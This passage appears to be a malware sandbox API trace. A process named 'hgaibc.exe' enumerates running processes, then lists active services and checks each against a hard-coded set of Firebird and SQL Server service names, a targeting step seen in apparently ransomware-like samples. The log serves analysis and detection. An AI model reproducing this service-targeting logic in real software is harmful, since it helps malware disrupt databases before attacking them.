lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0177.982] lstrlenW (lpString="System") returned 6 [0177.982] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0177.983] lstrlenW (lpString="smss.exe") returned 8 [0177.983] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0177.984] lstrlenW (lpString="csrss.exe") returned 9 [0177.984] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0177.984] lstrlenW (lpString="wininit.exe") returned 11 [0177.985] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0177.985] lstrlenW (lpString="csrss.exe") returned 9 [0177.985] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0177.986] lstrlenW (lpString="winlogon.exe") returned 12 [0177.986] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0177.987] lstrlenW (lpString="services.exe") returned 12 [0177.987] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0177.988] lstrlenW (lpString="lsass.exe") returned 9 [0177.988] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0177.989] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0177.989] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0177.989] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0177.990] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.990] lstrlenW (lpString="svchost.exe") returned 11 [0177.990] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.991] lstrlenW (lpString="svchost.exe") returned 11 [0177.991] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0177.992] lstrlenW (lpString="dwm.exe") returned 7 [0177.992] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.993] lstrlenW (lpString="svchost.exe") returned 11 [0177.993] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.993] lstrlenW (lpString="svchost.exe") returned 11 [0177.993] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.994] lstrlenW (lpString="svchost.exe") returned 11 [0177.994] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.995] lstrlenW (lpString="svchost.exe") returned 11 [0177.995] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.996] lstrlenW (lpString="svchost.exe") returned 11 [0177.996] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.997] lstrlenW (lpString="svchost.exe") returned 11 [0177.997] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.997] lstrlenW (lpString="svchost.exe") returned 11 [0177.998] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.998] lstrlenW (lpString="svchost.exe") returned 11 [0177.998] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.999] lstrlenW (lpString="svchost.exe") returned 11 [0177.999] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.000] lstrlenW (lpString="svchost.exe") returned 11 [0178.000] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0178.001] lstrlenW (lpString="spoolsv.exe") returned 11 [0178.001] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.002] lstrlenW (lpString="svchost.exe") returned 11 [0178.002] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0178.003] lstrlenW (lpString="audiodg.exe") returned 11 [0178.003] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0178.003] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0178.003] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0178.004] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0178.004] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0178.005] lstrlenW (lpString="Memory Compression") returned 18 [0178.005] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0178.006] lstrlenW (lpString="sihost.exe") returned 10 [0178.006] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.007] lstrlenW (lpString="svchost.exe") returned 11 [0178.007] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0178.008] lstrlenW (lpString="msoia.exe") returned 9 [0178.008] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0178.009] lstrlenW (lpString="taskhostw.exe") returned 13 [0178.009] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0178.010] lstrlenW (lpString="explorer.exe") returned 12 [0178.010] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0178.011] lstrlenW (lpString="SearchUI.exe") returned 12 [0178.011] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0178.012] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0178.012] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0178.012] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0178.012] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0178.013] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0178.013] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0178.014] lstrlenW (lpString="hgaibc.exe") returned 10 [0178.014] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0178.015] lstrlenW (lpString="conhost.exe") returned 11 [0178.015] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0178.015] lstrlenW (lpString="dllhost.exe") returned 11 [0178.016] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0178.016] lstrlenW (lpString="dllhost.exe") returned 11 [0178.016] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0178.017] lstrlenW (lpString="hgaibc.exe") returned 10 [0178.017] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x2a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0178.187] lstrlenW (lpString="cmd.exe") returned 7 [0178.187] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0178.188] lstrlenW (lpString="conhost.exe") returned 11 [0178.188] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0178.189] CloseHandle (hObject=0x2f0) returned 1 [0178.189] Sleep (dwMilliseconds=0x1f4) [0179.102] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6bef98 [0179.103] EnumServicesStatusExW (in: hSCManager=0x6bef98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 0 [0179.103] GetLastError () returned 0xea [0179.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c30) returned 0x772b48 [0179.104] EnumServicesStatusExW (in: hSCManager=0x6bef98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x772b48, cbBufSize=0x1c30, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x772b48, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 1 [0179.104] CloseServiceHandle (hSCObject=0x6bef98) returned 1 [0179.105] lstrlenW (lpString="Appinfo") returned 7 [0179.105] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0179.105] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0179.105] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0179.105] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0179.105] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0179.105] lstrlenW (lpString="AppXSvc") returned 7 [0179.105] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0179.105] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0179.105] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0179.105] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0179.105] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0179.105] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0179.105] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0179.105] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0179.105] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0179.105] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0179.105] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0179.105] lstrlenW (lpString="Audiosrv") returned 8 [0179.105] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0179.105] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0179.105] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0179.105] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0179.105] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0179.106] lstrlenW (lpString="BFE") returned 3 [0179.106] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0179.106] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0179.106] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0179.106] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0179.106] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0179.106] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0179.106] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0179.106] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0179.106] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0179.106] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0179.106] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0179.106] lstrlenW (lpString="CDPSvc") returned 6 [0179.106] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0179.106] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0179.106] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0179.106] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0179.106] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0179.106] lstrlenW (lpString="ClickToRunSvc") returned 13 [0179.106] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0179.106] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0179.106] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0179.106] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0179.106] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0179.106] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0179.106] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0179.106] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0179.107] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0179.107] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0179.107] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0179.107] lstrlenW (lpString="CryptSvc") returned 8 [0179.107] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0179.107] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0179.107] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0179.107] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0179.107] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0179.107] lstrlenW (lpString="DcomLaunch") returned 10 [0179.107] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0179.107] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0179.107] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0179.107] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0179.107] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0179.107] lstrlenW (lpString="DeviceAssociationService") returned 24 [0179.107] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0179.107] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0179.107] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0179.107] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0179.107] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0179.107] lstrlenW (lpString="Dhcp") returned 4 [0179.107] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0179.107] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0179.107] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0179.107] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0179.107] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0179.107] lstrlenW (lpString="Dnscache") returned 8 [0179.108] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0179.108] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0179.108] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0179.108] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0179.108] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0179.108] lstrlenW (lpString="DPS") returned 3 [0179.108] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0179.108] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0179.108] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0179.108] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0179.108] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0179.108] lstrlenW (lpString="DusmSvc") returned 7 [0179.108] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0179.108] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0179.108] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0179.108] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0179.108] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0179.108] lstrlenW (lpString="EventLog") returned 8 [0179.108] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0179.108] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0179.108] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0179.108] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0179.108] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0179.108] lstrlenW (lpString="EventSystem") returned 11 